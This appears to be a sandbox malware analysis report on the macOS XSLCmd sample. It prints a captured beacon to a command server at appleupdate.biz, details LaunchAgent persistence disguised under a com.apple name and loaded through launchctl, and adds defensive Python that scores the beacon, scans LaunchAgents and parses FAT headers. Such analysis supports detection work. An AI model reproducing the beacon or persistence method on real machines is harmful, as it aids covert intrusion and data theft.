
Analysis Report

Overview

General Information

Analysis ID: 4
Start time: 00:19:57
Start date: 17/09/2014
Overall analysis duration: 0h 5m 43s
Report type: full
Sample file name: sample-xslcmd
Cookbook file name: default.jbs
Analysis system description: Mac OS X, Lion, clean


Detection

Strategy: Threshold
Detection: malicious


Signature Overview


Networking:

URLs found in memory or binary data
Source: sample-xslcmd; String found in binary or memory: http://%s/%s
Source: sample-xslcmd; String found in binary or memory: http://1234/config.htm
Source: sample-xslcmd; String found in binary or memory: http://babelfish.yahoo.com/translate_url?doit=done&tt=url&intl=1&fr=bf-home&trurl=%s?%d&lp=en_fr&btn
Source: sample-xslcmd; String found in binary or memory: http://crl.verisign.com/pca3.crl0
Source: sample-xslcmd; String found in binary or memory: http://evsecure-aia.verisign.com/evsecure2006.cer0n
Source: sample-xslcmd; String found in binary or memory: http://evsecure-crl.verisign.com/evsecure2006.crl0d
Source: sample-xslcmd; String found in binary or memory: http://evsecure-crl.verisign.com/pca3-g5.crl0
Source: sample-xslcmd; String found in binary or memory: http://evsecure-ocsp.verisign.com0
Source: sample-xslcmd; String found in binary or memory: http://evsecure-ocsp.verisign.com0=
Source: sample-xslcmd; String found in binary or memory: http://logo.verisign.com/vslogo.gif0)
Source: sample-xslcmd; String found in binary or memory: http://logo.verisign.com/vslogo.gif04
Source: sample-xslcmd; String found in binary or memory: http://logo.verisign.com/vslogo1.gif0
Source: sample-xslcmd; String found in binary or memory: http://ocsp.verisign.com0
Source: sample-xslcmd; String found in binary or memory: http://th
Source: sample-xslcmd; String found in binary or memory: http://translate.google.com
Source: sample-xslcmd; String found in binary or memory: http://translate.google.com/translate?prev=hp&hl=en&js=n&u=%s?%d&sl=es&tl=en
Source: sample-xslcmd; String found in binary or memory: http://www.apple.com/dtds/propertylist-1.0.dtd
Source: sample-xslcmd; String found in binary or memory: https://www.verisign.com/cps0
Source: sample-xslcmd; String found in binary or memory: https://www.verisign.com/cps0=
Source: sample-xslcmd; String found in binary or memory: https://www.verisign.com/rpa
Source: sample-xslcmd; String found in binary or memory: https://www.verisign.com/rpa0
(The verisign.com URLs are the CRL/OCSP/CPS pointers embedded in code-signing certificates; the entries with trailing "0", "0=", "0)" etc. are ASN.1 length bytes that followed the URL in the certificate blob. The "%s"/"%d" strings are printf-style format templates, so the final URLs are built at run time.)
Found strings which match known social media URLs
Source: sample-xslcmd; String found in binary or memory: http://babelfish.yahoo.com/translate_url?doit=done&tt=url&intl=1&fr=bf-home&trurl=%s?%d&lp=en_fr&btnTrUrl=Translate equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: help.apple.com
Posts data to webserver
Source: unknown; HTTP traffic detected:
    POST compose.aspx?s=6058ED81C06DAC84431B7823AB50C2A60B7ACD910D63AF1 HTTP/1.1
    Accept: */*
    Referer: http://www.appleupdate.biz/windows/cartoon
    Accept-Language: zh-cn
    Accept-Encoding: gzip
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: www.appleupdate.biz
    Connection: Keep-Alive
    Content-Length: 112
    Data Raw (112 bytes): 70 00 a7 94 af e4 fb 6f 53 78 80 00 5b f1 73 fc 68 fd b1 fd 84 ff 0d fd 87 ea 56 fd 6a f0 3f fb 7f ec 41 fc 3b f2 a3 fc 06 f1 d1 fd 36 f1 0c fc 66 f1 3c fd fa f1 f4 00 ea e5 f4 fa f4 ea f4 fb f8 f1 18 ff 20 e5 94 fd 46 f1 60 fd fa f1 f4 fd fa ea dc fd f2 f1 cc fd fa f1 f8 fd 5a f1 e4 fd b4 ff ec fd fa ef f4 ff fa f0 f0 fc f2 e8 9e fd
    Data Ascii: poSx[shVj?A;6f< F`Z
Uses network protocols on non-standard ports
Source: unknown; Network traffic detected: HTTP traffic on port 49328 -> 8000
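The POST above is the only network behaviour the sandbox captured, and several of its traits are detectable without knowing the C2 domain: HTTP to port 8000, a User-Agent that claims Internet Explorer 6 on Windows XP although the client is a Mac, a POST with no Content-Type, and a 112-byte body that is almost entirely non-printable. The following Python is an added example (not part of the Joe Sandbox report or of the sample) that reassembles that request from the headers and bytes printed above and scores it with those rules; the flow-record dict, the benign contrast flow and the leading "/" on the request target are assumptions of the example, not something the report shows.

```python
import string
from urllib.parse import urlparse

# Byte values an HTTP body would contain if it were text (ASCII letters,
# digits, punctuation and whitespace).
PRINTABLE = frozenset(string.printable.encode("ascii"))

# The 112 body bytes exactly as listed in the report's "Data Raw" field.
BODY = bytes.fromhex(
    "7000a794afe4fb6f5378"
    "80005bf173fc68fdb1fd"
    "84ff0dfd87ea56fd6af0"
    "3ffb7fec41fc3bf2a3fc"
    "06f1d1fd36f10cfc66f1"
    "3cfdfaf1f400eae5f4fa"
    "f4eaf4fbf8f118ff20e5"
    "94fd46f160fdfaf1f4fd"
    "faeadcfdf2f1ccfdfaf1"
    "f8fd5af1e4fdb4ffecfd"
    "faeff4fffaf0f0fcf2e8"
    "9efd"
)

# Hypothetical flow record (assumption of this example): one TCP flow
# reassembled into a single HTTP request. Headers are the ones in the report;
# the leading "/" on the target is assumed, the report prints it without one.
SAMPLE_FLOW = {
    "src_port": 49328,
    "dst_port": 8000,
    "request": (
        b"POST /compose.aspx?s=6058ED81C06DAC84431B7823AB50C2A60B7ACD910D63AF1 HTTP/1.1\r\n"
        b"Accept: */*\r\n"
        b"Referer: http://www.appleupdate.biz/windows/cartoon\r\n"
        b"Accept-Language: zh-cn\r\n"
        b"Accept-Encoding: gzip\r\n"
        b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
        b"Host: www.appleupdate.biz\r\n"
        b"Connection: Keep-Alive\r\n"
        b"Content-Length: 112\r\n"
        b"\r\n"
    ) + BODY,
}

# Constructed benign flow for contrast (not from the report).
BENIGN_FLOW = {
    "src_port": 50001,
    "dst_port": 80,
    "request": (
        b"GET /index.html HTTP/1.1\r\n"
        b"Host: help.apple.com\r\n"
        b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/534.57.2 Safari/534.57.2\r\n"
        b"Accept: */*\r\n"
        b"\r\n"
    ),
}


def parse_http_request(raw: bytes) -> dict:
    """Split a raw request into request line, lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, version = lines[0].decode("latin-1").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def beacon_indicators(flow: dict, host_os: str = "macOS") -> list:
    """Return the traits of one flow that match the beacon pattern in the report."""
    req = parse_http_request(flow["request"])
    hdr = req["headers"]
    hits = []
    if flow["dst_port"] not in (80, 8080, 443):
        hits.append("HTTP on non-standard port %d" % flow["dst_port"])
    if host_os == "macOS" and "Windows" in hdr.get("user-agent", ""):
        hits.append("User-Agent claims Windows from a macOS host")
    referer = hdr.get("referer")
    if referer and hdr.get("host") and urlparse(referer).hostname != hdr["host"]:
        hits.append("Referer host differs from Host header")
    declared = hdr.get("content-length")
    if declared is not None and int(declared) != len(req["body"]):
        hits.append("Content-Length does not match body size")
    if req["method"] == "POST" and "content-type" not in hdr:
        hits.append("POST without Content-Type")
    body = req["body"]
    if body:
        opaque = sum(1 for b in body if b not in PRINTABLE) / len(body)
        if opaque > 0.3:
            hits.append("opaque POST body (%.0f%% non-printable)" % (opaque * 100))
    return hits


if __name__ == "__main__":
    for name, flow in (("sample", SAMPLE_FLOW), ("benign", BENIGN_FLOW)):
        print(name, "->", beacon_indicators(flow) or ["no indicators"])
```

The port and User-Agent rules are the cheap ones to deploy on a proxy or IDS; the body-entropy rule needs the reassembled payload and will also fire on legitimate binary uploads, so it is best treated as a scoring input rather than an alert on its own.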

Boot Survival:

Creates highly persistent launch services
Source: /Users/urugan/Desktop/sample-xslcmd; Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Creates user-wide 'launchd' managed services aka launch agents
Source: /Users/urugan/Desktop/sample-xslcmd; Bundle Info.plist file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist

Persistence and Installation Behavior:

Writes property list (.plist) files to disk
Source: /Users/urugan/Desktop/sample-xslcmd; Binary plist file created: /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Creates hidden files, links and/or directories
Source: /Users/urugan/Library/LaunchAgents/clipboardd; Hidden file created: /Users/urugan/Desktop/.got
Source: /Users/urugan/Library/LaunchAgents/clipboardd; Hidden file created: /Users/urugan/Documents/.got
Explicitly loads/starts launch services
Source: /bin/sh; Launch agent/daemon loaded: launchctl load /Users/urugan/Library/LaunchAgents/com.apple.service.clipboardd.plist
Writes FAT Mach-O files to disk
Source: /Users/urugan/Desktop/sample-xslcmd; File written: /Users/urugan/Library/LaunchAgents/clipboardd
Source: /usr/sbin/kextcache; File written: /System/Library/Caches/com.apple.kext.caches/Startup/kernelcache.c9TF
(Note that the second entry is attributed to /usr/sbin/kextcache, the OS's own kernel-cache rebuilder, not to the sample's process tree; the sample's dropped binary is the clipboardd file, written into the LaunchAgents directory itself and started through launchctl by a shell it spawns.)
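The Boot Survival and Persistence entries above describe one mechanism: a binary plist under ~/Library/LaunchAgents with RunAtLoad/KeepAlive set, a label squatting on the com.apple. namespace, and the program it launches stored in the LaunchAgents directory itself. The following Python is an added example (not code from the report, the sandbox or the sample) that scans a LaunchAgents directory for exactly those three traits. The plist contents it writes are an assumption that mirrors the report's artefact (the report records only that KeepAlive and/or RunAtLoad were set, not the full plist), and the benign contrast agent is constructed.

```python
import os
import plistlib
import tempfile


def write_sample_agent(agents_dir: str) -> str:
    """Constructed stand-in for the report's artefact (assumed contents)."""
    path = os.path.join(agents_dir, "com.apple.service.clipboardd.plist")
    payload = {
        "Label": "com.apple.service.clipboardd",
        "ProgramArguments": [os.path.join(agents_dir, "clipboardd")],
        "RunAtLoad": True,
        "KeepAlive": True,
    }
    with open(path, "wb") as fh:
        plistlib.dump(payload, fh, fmt=plistlib.FMT_BINARY)  # binary plist, as in the report
    return path


def program_path(plist: dict):
    """launchd accepts either Program or ProgramArguments[0] as the executable."""
    if plist.get("Program"):
        return plist["Program"]
    args = plist.get("ProgramArguments") or []
    return args[0] if args else None


def assess_agent(path: str, agents_dir: str) -> list:
    """Return the suspicious traits of one launch agent plist (empty list if none)."""
    with open(path, "rb") as fh:
        plist = plistlib.load(fh)  # plistlib auto-detects XML and binary plists
    findings = []
    label = plist.get("Label", "")
    prog = program_path(plist)
    if plist.get("RunAtLoad") or plist.get("KeepAlive"):
        findings.append("RunAtLoad/KeepAlive set")
    # Apple's own agents live in /System/Library/LaunchAgents; a user-writable
    # com.apple.* plist is name-squatting and deserves a look.
    if label.startswith("com.apple.") or os.path.basename(path).startswith("com.apple."):
        findings.append("com.apple.* label in a user LaunchAgents directory")
    # The launched executable should not live inside the LaunchAgents directory.
    if prog and os.path.dirname(os.path.abspath(prog)) == os.path.abspath(agents_dir):
        findings.append("program binary stored inside LaunchAgents")
    return findings


def scan_launch_agents(agents_dir: str) -> dict:
    """Map plist file name -> findings for every agent that has at least one."""
    report = {}
    for name in sorted(os.listdir(agents_dir)):
        if not name.endswith(".plist"):
            continue
        hits = assess_agent(os.path.join(agents_dir, name), agents_dir)
        if hits:
            report[name] = hits
    return report


def demo() -> dict:
    """Scan a temporary directory holding the sample agent and a benign one."""
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_agent(tmp)
        # Constructed benign agent: no persistence keys, binary outside LaunchAgents.
        with open(os.path.join(tmp, "org.example.updater.plist"), "wb") as fh:
            plistlib.dump({"Label": "org.example.updater",
                           "ProgramArguments": ["/usr/local/bin/updater"]}, fh)
        return scan_launch_agents(tmp)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, "->", "; ".join(hits))
```

On a real host run scan_launch_agents on each user's ~/Library/LaunchAgents (and, with elevated rights, /Library/LaunchAgents and /Library/LaunchDaemons); the RunAtLoad/KeepAlive trait alone is common in legitimate software, so the label and program-location traits are the ones that separate this artefact from noise.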

Hooking and other Techniques for Hiding and Protection:

Moves itself during installation or deletes itself after installation
Source: /Users/urugan/Desktop/sample-xslcmd; File deleted: /Users/urugan/Desktop/sample-xslcmd
Uses network protocols on non-standard ports
Source: unknown; Network traffic detected: HTTP traffic on port 49328 -> 8000

Language, Device and Operating System Detection:

Sample file contains a Mach-O for PowerPC architectures
Source: initial sample; Static Mach-O information: PowerPC
FAT Mach-O sample file contains more than two architectures
Source: initial sample; Static Mach-O information: Mach-O fat file with 3 architectures
Queries OS software version with built-in shell command
Source: /bin/sh; sw_vers executed: sw_vers -productVersion
Source: /bin/sh; sw_vers executed: sw_vers -productName
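The two static findings above (a PowerPC slice, and three architectures in one FAT file) come from the universal-binary header, which is small enough to parse by hand: a big-endian magic 0xCAFEBABE, a slice count, and one 20-byte fat_arch record (cputype, cpusubtype, offset, size, align) per slice. The Python below is an added example (not code from the report or the sandbox) that parses that header and reports the architectures; the three-slice file it builds is constructed with the same layout as the report describes, not the sample's bytes. It also handles the classic false positive: Java class files start with the same 0xCAFEBABE magic, so a slice table is trusted only if it fits in the file and every slice begins with a Mach-O magic.

```python
import struct

FAT_MAGIC = 0xCAFEBABE          # big-endian magic of a universal (FAT) binary
CPU_ARCH_ABI64 = 0x01000000
CPU_TYPE_X86 = 7
CPU_TYPE_X86_64 = CPU_TYPE_X86 | CPU_ARCH_ABI64
CPU_TYPE_POWERPC = 18
CPU_TYPE_POWERPC64 = CPU_TYPE_POWERPC | CPU_ARCH_ABI64
CPU_NAMES = {CPU_TYPE_X86: "i386", CPU_TYPE_X86_64: "x86_64",
             CPU_TYPE_POWERPC: "ppc", CPU_TYPE_POWERPC64: "ppc64"}

# Mach-O magics as seen when the first four bytes are read big-endian:
# 0xFEEDFACE/0xFEEDFACF for big-endian (PowerPC) slices, byte-swapped
# for little-endian (Intel) slices.
MACHO_MAGICS = {0xFEEDFACE, 0xFEEDFACF, 0xCEFAEDFE, 0xCFFAEDFE}

FAT_HEADER = struct.Struct(">II")    # magic, nfat_arch
FAT_ARCH = struct.Struct(">IIIII")   # cputype, cpusubtype, offset, size, align


def parse_fat_header(data: bytes) -> list:
    """Return (cputype, cpusubtype, offset, size) per slice, or [] if data is
    not a well-formed FAT file (wrong magic, table past EOF, slice without a
    Mach-O magic). A Java .class file fails the table-size or slice checks."""
    if len(data) < FAT_HEADER.size:
        return []
    magic, nfat = FAT_HEADER.unpack_from(data, 0)
    if magic != FAT_MAGIC or nfat == 0:
        return []
    if len(data) < FAT_HEADER.size + nfat * FAT_ARCH.size:
        return []
    slices = []
    for i in range(nfat):
        cputype, cpusubtype, offset, size, _align = FAT_ARCH.unpack_from(
            data, FAT_HEADER.size + i * FAT_ARCH.size)
        if size < 4 or offset + size > len(data):
            return []
        if struct.unpack_from(">I", data, offset)[0] not in MACHO_MAGICS:
            return []
        slices.append((cputype, cpusubtype, offset, size))
    return slices


def describe_fat(data: bytes) -> dict:
    """Summarise the slices the way the report's two static findings do."""
    slices = parse_fat_header(data)
    arches = [CPU_NAMES.get(c, hex(c)) for c, _, _, _ in slices]
    return {
        "arches": arches,
        "count": len(arches),
        "has_powerpc": any((c & ~CPU_ARCH_ABI64) == CPU_TYPE_POWERPC
                           for c, _, _, _ in slices),
        "more_than_two": len(arches) > 2,
    }


def build_sample_fat() -> bytes:
    """Constructed three-slice FAT file (ppc, i386, x86_64); each slice is a
    bare Mach-O magic on a 4 KiB boundary. Same layout as the report's
    sample, not its bytes."""
    page = 0x1000
    stubs = [
        (CPU_TYPE_POWERPC, 0, struct.pack(">I", 0xFEEDFACE)),  # big-endian 32-bit
        (CPU_TYPE_X86, 3, struct.pack("<I", 0xFEEDFACE)),      # little-endian 32-bit
        (CPU_TYPE_X86_64, 3, struct.pack("<I", 0xFEEDFACF)),   # little-endian 64-bit
    ]
    out = bytearray(page * (len(stubs) + 1))
    FAT_HEADER.pack_into(out, 0, FAT_MAGIC, len(stubs))
    for i, (cputype, cpusubtype, stub) in enumerate(stubs):
        offset = page * (i + 1)
        FAT_ARCH.pack_into(out, FAT_HEADER.size + i * FAT_ARCH.size,
                           cputype, cpusubtype, offset, len(stub), 12)  # align = 2**12
        out[offset:offset + len(stub)] = stub
    return bytes(out)


if __name__ == "__main__":
    print(describe_fat(build_sample_fat()))
```

To run it against a real file, pass open(path, "rb").read() to describe_fat; a PowerPC slice in a 2014 sample is a triage signal in its own right, since a current Mac cannot execute it and its presence suggests either an old toolchain or a long-lived codebase.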

Yara Overview

No Yara matches
